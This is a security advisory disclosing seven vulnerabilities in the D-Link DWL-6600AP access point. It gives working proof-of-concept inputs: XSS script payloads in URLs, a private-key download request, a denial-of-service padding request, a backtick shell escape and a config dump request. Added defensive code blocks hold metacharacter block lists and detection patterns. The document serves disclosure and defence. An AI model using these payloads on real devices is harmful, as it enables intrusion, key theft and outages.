D-Link 6600-AP XSS / DoS / Information Disclosure

Posted Jul 31, 2019
Authored by Sandstorm Security

D-Link 6600-AP suffers from cross site scripting, key extraction, shell escape, config file disclosure, and denial of service vulnerabilities.

tags | exploit, denial of service, shell, vulnerability, xss, info disclosure
advisories | CVE-2019-14332, CVE-2019-14333, CVE-2019-14334, CVE-2019-14335, CVE-2019-14336, CVE-2019-14337, CVE-2019-14338
MD5 | 34d7b01b0cc7b4800d4f8258dd3e8990

# Security Advisory - 22/07/2019

## Multiple vulnerabilities found in the D-Link 6600-AP

Multiple vulnerabilities were found in the D-Link 6600-AP device running the latest firmware (version 4.2.0.14). The D-Link 6600-AP is no longer produced, but support is still provided by D-Link, as described on the D-Link website. Note that this product is built for D-Link's business customers, so thousands of devices can be expected to be at risk. The code base is shared with the DWL-3600AP and DWL-8610AP.

### This advisory was sent to D-Link on 22/05/2019
Many thanks to the D-Link Security Team for their prompt response!

### Affected Product
D-Link 6600-AP and DWL-3600AP; vulnerability number 2 also affects the DWL-8610AP.

### Firmware version
4.2.0.14 Revision Ax date: 21/03/2019

### Last version available
https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point

### Product Identifier
WLAN-EAP

### Hardware Version
A2

### Manufacturer
D-LINK

## Product Description
The DWL-6600AP is designed to be the best-in-class indoor Access Point
for business environments. With high data transmission speeds, load
balancing features, it can be deployed as a standalone wireless Access
Point or used as the foundation for a managed wireless network.
Source: https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point

## List of Vulnerabilities

1. CVE-2019-14338 - Post-authenticated XSS
2. CVE-2019-14334 - Post-authenticated certificate and RSA private key extraction through an HTTP command
3. CVE-2019-14333 - Pre-authenticated denial of service leading to the reboot of the AP
4. CVE-2019-14337 - Shell escape in the restricted command line interface
5. CVE-2019-14335 - Post-authenticated denial of service leading to the reboot of the AP
6. CVE-2019-14336 - Post-authenticated dump of all the config files
7. CVE-2019-14332 - Use of weak ciphers for SSH

### 1. Post-authenticated XSS
#### Exploitation: Local
#### Severity Level: High
#### CVE ID: CVE-2019-14338
#### Proof of concept

Example 1: http://10.90.90.91/admin.cgi?action=<script>alert(document.cookie)</script>

Example 2: http://10.90.90.91/admin.cgi?action=+guest<script>alert('Pwned')</script>

### 2. Post-authenticated certificate and RSA private key extraction through an HTTP command
#### Exploitation: Local
#### Severity Level: High
#### CVE ID: CVE-2019-14334
#### Proof of concept

http://10.90.90.91/sslcert-get.cgi?

Result of the command: the file "mini_httpd.pem", containing the web server's certificate and RSA private key, is served for download.

```
-----BEGIN RSA PRIVATE KEY-----
[private key material omitted from this copy of the advisory]
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
[certificate omitted from this copy of the advisory]
-----END CERTIFICATE-----
```

### 3. Pre-authenticated denial of service leading to the reboot of the AP
#### Exploitation: Local
#### Severity Level: High
#### CVE ID: CVE-2019-14333
#### Proof of concept

```
kali# curl -X POST 'http://10.90.90.91/admin.cgi?action=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
```

### 4. Shell escape in the restricted command line interface
#### Exploitation: Local
#### Severity Level: High
#### CVE ID: CVE-2019-14337
#### Proof of concept

```
DLINK-WLAN-AP# wget
Invalid command.
DLINK-WLAN-AP# `/bin/sh -c wget`
BusyBox v1.18.2 (2019-01-24 14:39:11 IST) multi-call binary.

Usage: wget [-c|--continue] [-s|--spider] [-q|--quiet] [-O|--output-document FILE]
        [--header 'header: value'] [-Y|--proxy on/off] [-P DIR]
        [--no-check-certificate] [-U|--user-agent AGENT][-T SEC] URL

Retrieve files via HTTP or FTP

Options:
        -s      Spider mode - only check file existence
        -c      Continue retrieval of aborted transfer
        -q      Quiet
        -P DIR  Save to DIR (default .)
        -T SEC  Network read timeout is SEC seconds
        -O FILE Save to FILE ('-' for stdout)
        -U STR  Use STR for User-Agent header
        -Y      Use proxy ('on' or 'off')

DLINK-WLAN-AP#
```
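The session above shows a restricted CLI that rejects `wget` by name yet still hands the raw line to a shell, where backticks are expanded. The hardened counterpart is to never invoke a shell at all: tokenise the line, allowlist the command and the shape of each argument, and refuse shell metacharacters before anything else happens. The following is an added example, not the device's code; the four-command allowlist, the argument patterns and the `CommandError` type are this example's own assumptions.

```python
"""Restricted-CLI input validation: tokenise, allowlist, and return an argv that
would be passed to subprocess.run(..., shell=False). No shell ever sees the line."""
import re
import shlex
from typing import List, Optional

# Hypothetical allowlist: command -> (min args, max args, per-argument pattern).
ARG_RULES = {
    "help":   (0, 0, None),
    "show":   (1, 1, re.compile(r"^(version|config|clients)$")),
    "ping":   (1, 1, re.compile(r"^[A-Za-z0-9.\-]{1,253}$")),
    "reboot": (0, 0, None),
}

# Shell metacharacters refused before tokenising (defence in depth: the hardened
# path never calls a shell, but a later refactor must not be able to reintroduce one).
SHELL_META = set("`$;|&<>(){}\\\n\r")


class CommandError(ValueError):
    """Raised for anything the restricted CLI must not execute."""


def parse_restricted(line: str) -> List[str]:
    """Validate one CLI line and return the argv to execute without a shell."""
    bad = sorted(ch for ch in set(line) if ch in SHELL_META)
    if bad:
        raise CommandError("shell metacharacters not permitted: " + repr("".join(bad)))
    try:
        argv = shlex.split(line)          # POSIX quoting rules, no shell involved
    except ValueError as exc:             # unbalanced quotes
        raise CommandError("malformed quoting: " + str(exc))
    if not argv:
        raise CommandError("empty command")
    cmd, args = argv[0], argv[1:]
    if cmd not in ARG_RULES:
        raise CommandError("Invalid command.")
    lo, hi, pattern = ARG_RULES[cmd]
    if not lo <= len(args) <= hi:
        raise CommandError(f"{cmd}: expected between {lo} and {hi} argument(s)")
    if pattern and not all(pattern.match(a) for a in args):
        raise CommandError(f"{cmd}: argument does not match the allowed form")
    return argv


def rejection_reason(line: str) -> Optional[str]:
    """None if the line is acceptable, otherwise the reason it was refused."""
    try:
        parse_restricted(line)
    except CommandError as exc:
        return str(exc)
    return None


if __name__ == "__main__":
    for line in ["show version", "wget", "`/bin/sh -c wget`", "ping 10.90.90.1; reboot"]:
        print(f"{line!r:32} -> {rejection_reason(line) or 'accepted'}")
```

The returned argv is what a dispatcher would pass to `subprocess.run` with `shell=False` and an absolute program path; the metacharacter check is redundant with that design on purpose, so the backtick line from the session is refused at the first step rather than relying on the absence of a shell further down.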

### 5. Post-authenticated denial of service leading to the reboot of the AP
#### Exploitation: Local
#### Severity Level: High
#### CVE ID: CVE-2019-14335
#### Proof of concept

http://10.90.90.91/admin.cgi?action=%s

### 6. Post-authenticated dump of all the config files
#### Exploitation: Local
#### Severity Level: High
#### CVE ID: CVE-2019-14336
#### Proof of concept

http://10.90.90.91/admin.cgi?action=
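Sections 1, 3, 5 and 6 all go through the `action` parameter of `admin.cgi` (a script tag, a very long value, a `%s`, an empty value) and section 2 through `sslcert-get.cgi`, so the request line alone is enough to spot attempts in the access point's or a front proxy's access log. The detector below is an added example, not part of the advisory or of D-Link's software: the log lines it scans are constructed, the `LONG_ACTION` threshold is an assumption, and the rule labels are this example's own.

```python
"""Flag access-log requests matching the admin.cgi / sslcert-get.cgi patterns
described in the advisory. Input is Common Log Format; the sample lines are constructed."""
import re
from typing import Dict, List
from urllib.parse import parse_qs, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Length above which an action value is treated as the padding DoS (assumption:
# the advisory's PoC sends roughly 300 characters, legitimate actions are short words).
LONG_ACTION = 128
SCRIPT_RE = re.compile(r"<\s*script", re.IGNORECASE)
PERCENT_SPEC_RE = re.compile(r"%[sdxnp]", re.IGNORECASE)


def classify(target: str) -> List[str]:
    """Return the rules a request target matches (empty list means nothing suspicious)."""
    hits: List[str] = []
    parts = urlsplit(target)
    if parts.path == "/sslcert-get.cgi":
        hits.append("cert+key download (CVE-2019-14334)")
        return hits
    if parts.path != "/admin.cgi":
        return hits
    params = parse_qs(parts.query, keep_blank_values=True)   # keep "action=" (empty)
    if "action" not in params:
        return hits
    action = params["action"][0]                            # percent-decoded value
    if action == "":
        hits.append("empty action / config dump (CVE-2019-14336)")
    if SCRIPT_RE.search(action):
        hits.append("script tag in action / XSS (CVE-2019-14338)")
    if PERCENT_SPEC_RE.search(action):
        hits.append("%-specifier in action / DoS (CVE-2019-14335)")
    if len(action) >= LONG_ACTION:
        hits.append("oversized action / DoS (CVE-2019-14333)")
    return hits


def scan(log_text: str) -> List[Dict[str, object]]:
    """Parse each CLF line and collect the ones that match at least one rule."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        rules = classify(m["target"])
        if rules:
            findings.append({"ip": m["ip"], "method": m["method"],
                             "target": m["target"], "rules": rules})
    return findings


# Constructed sample log (documentation-range client addresses, not real traffic).
SAMPLE_LOG = "\n".join([
    '192.0.2.10 - - [31/Jul/2019:10:00:01 +0000] "GET /admin.cgi?action=status HTTP/1.1" 200 512',
    '192.0.2.11 - - [31/Jul/2019:10:00:02 +0000] "GET /admin.cgi?action=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 912',
    '192.0.2.12 - - [31/Jul/2019:10:00:03 +0000] "POST /admin.cgi?action=' + "A" * 300 + ' HTTP/1.1" 500 0',
    '192.0.2.13 - - [31/Jul/2019:10:00:04 +0000] "GET /admin.cgi?action=%25s HTTP/1.1" 500 0',
    '192.0.2.14 - - [31/Jul/2019:10:00:05 +0000] "GET /admin.cgi?action= HTTP/1.1" 200 40211',
    '192.0.2.15 - - [31/Jul/2019:10:00:06 +0000] "GET /sslcert-get.cgi? HTTP/1.1" 200 3001',
])

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['ip']:12} {f['method']:4} {f['target'][:60]:60} {'; '.join(f['rules'])}")
```

Matching is done on the decoded value, so `%3Cscript%3E` and a literal `<script>` are treated alike, and a raw `%s` (an invalid percent-escape that the decoder leaves untouched) is caught the same way as the encoded `%25s`. A legitimate `action=status` request produces no finding.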

### 7. Use of weak ciphers for SSH
#### Exploitation: Local
#### Severity Level: High
#### CVE ID: CVE-2019-14332
#### Proof of concept

```
root@kali:~# ssh -l admin 10.90.90.91 -oKexAlgorithms=diffie-hellman-group1-sha1
The authenticity of host '10.90.90.91 (10.90.90.91)' can't be established.
RSA key fingerprint is SHA256:X8FPwxBpaDJq77gKs/HxggThGUIXWH4nu6tukuW6PGI.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.90.90.91' (RSA) to the list of known hosts.
admin@10.90.90.91's password:
Enter 'help' for help.

DLINK-WLAN-AP# help
```
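The session above proves the point by forcing the legacy `diffie-hellman-group1-sha1` key exchange; an audit of a fleet is easier done from the server's own offer, which is the `SSH_MSG_KEXINIT` it sends before any authentication. The following parser is an added example, not part of the advisory or of D-Link's firmware: it decodes the KEXINIT layout of RFC 4253 section 7.1 and grades each name-list against a weak-algorithm list that is this example's own choice (SHA-1 and 1024-bit group key exchange, CBC and RC4 ciphers, MD5 and truncated MACs, DSA host keys). `SAMPLE_OFFER` is constructed, not captured from a device, and `build_kexinit` exists only to serialise it into test input.

```python
"""Parse an SSH KEXINIT payload and report the weak algorithms a server offers."""
import struct
from typing import Dict, List

SSH_MSG_KEXINIT = 20
FIELDS = ["kex", "host_key", "enc_c2s", "enc_s2c", "mac_c2s", "mac_s2c",
          "comp_c2s", "comp_s2c", "lang_c2s", "lang_s2c"]
CATEGORY = {"kex": "kex", "host_key": "host_key", "enc_c2s": "enc", "enc_s2c": "enc",
            "mac_c2s": "mac", "mac_s2c": "mac"}
# Weak-algorithm lists chosen for this example (not from the advisory).
WEAK = {
    "kex": {"diffie-hellman-group1-sha1", "diffie-hellman-group14-sha1",
            "diffie-hellman-group-exchange-sha1"},
    "host_key": {"ssh-dss"},
    "enc": {"3des-cbc", "arcfour", "arcfour128", "arcfour256", "blowfish-cbc",
            "cast128-cbc", "aes128-cbc", "aes192-cbc", "aes256-cbc"},
    "mac": {"hmac-md5", "hmac-md5-96", "hmac-sha1-96"},
}


def _name_list(names: List[str]) -> bytes:
    """SSH name-list wire form: uint32 length followed by comma-separated ASCII names."""
    data = ",".join(names).encode("ascii")
    return struct.pack(">I", len(data)) + data


def build_kexinit(lists: Dict[str, List[str]], cookie: bytes = bytes(16)) -> bytes:
    """Serialise a KEXINIT payload; used here only to construct test input."""
    out = bytes([SSH_MSG_KEXINIT]) + cookie
    for field in FIELDS:
        out += _name_list(lists.get(field, []))
    return out + b"\x00" + b"\x00\x00\x00\x00"   # first_kex_packet_follows, reserved


def parse_kexinit(payload: bytes) -> Dict[str, List[str]]:
    """Decode the ten name-lists that follow the message byte and the 16-byte cookie."""
    if not payload or payload[0] != SSH_MSG_KEXINIT:
        raise ValueError("not a KEXINIT payload")
    pos, lists = 17, {}
    for field in FIELDS:
        if pos + 4 > len(payload):
            raise ValueError("truncated name-list length")
        (n,) = struct.unpack_from(">I", payload, pos)
        pos += 4
        if pos + n > len(payload):
            raise ValueError("truncated name-list")
        raw = payload[pos:pos + n].decode("ascii")
        pos += n
        lists[field] = raw.split(",") if raw else []
    if len(payload) - pos != 5:               # boolean + reserved uint32
        raise ValueError("unexpected trailer length")
    return lists


def weak_algorithms(lists: Dict[str, List[str]]) -> Dict[str, List[str]]:
    """Per field, the offered names found on the weak list; clean fields are omitted."""
    findings = {}
    for field, names in lists.items():
        cat = CATEGORY.get(field)
        if cat is None:                       # compression and language lists are not graded
            continue
        hits = [n for n in names if n in WEAK[cat]]
        if hits:
            findings[field] = hits
    return findings


# Constructed offer resembling an older embedded sshd that still lists group1 and CBC.
SAMPLE_OFFER = {
    "kex": ["diffie-hellman-group14-sha1", "diffie-hellman-group1-sha1"],
    "host_key": ["ssh-rsa"],
    "enc_c2s": ["aes128-ctr", "aes128-cbc", "3des-cbc"],
    "enc_s2c": ["aes128-ctr", "aes128-cbc", "3des-cbc"],
    "mac_c2s": ["hmac-sha1", "hmac-md5"],
    "mac_s2c": ["hmac-sha1", "hmac-md5"],
    "comp_c2s": ["none"], "comp_s2c": ["none"],
}

if __name__ == "__main__":
    for field, hits in weak_algorithms(parse_kexinit(build_kexinit(SAMPLE_OFFER))).items():
        print(f"{field}: weak = {', '.join(hits)}")
```

In practice the payload comes from the first unencrypted packet after the version exchange (a packet capture, or an SSH library's transport layer); the parser grades only what the server advertises, which is exactly what a fix has to change.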

## Report Timeline
22/05/2019 : This advisory is sent to D-Link; the contents of this report will be made public within 30 days.
22/06/2019 : Public release of the security advisory to the mailing list.

## Fixes/Updates
ftp://ftp2.dlink.com/PRODUCTS/DWL-3600AP/REVA/DWL-3600AP_REVA_FIRMWARE_v4.2.0.15.zip
ftp://ftp2.dlink.com/PRODUCTS/DWL-6600AP/REVA/DWL-6600AP_REVA_FIRMWARE_v4.2.0.15.zip


## About me - pwn.sandstorm@gmail.com
#### Independent EMSecurity Researcher in the field of IoT under the Sun
#### Always open to hack and share
#### Greetings - Ack P. Kim and others for the online resources

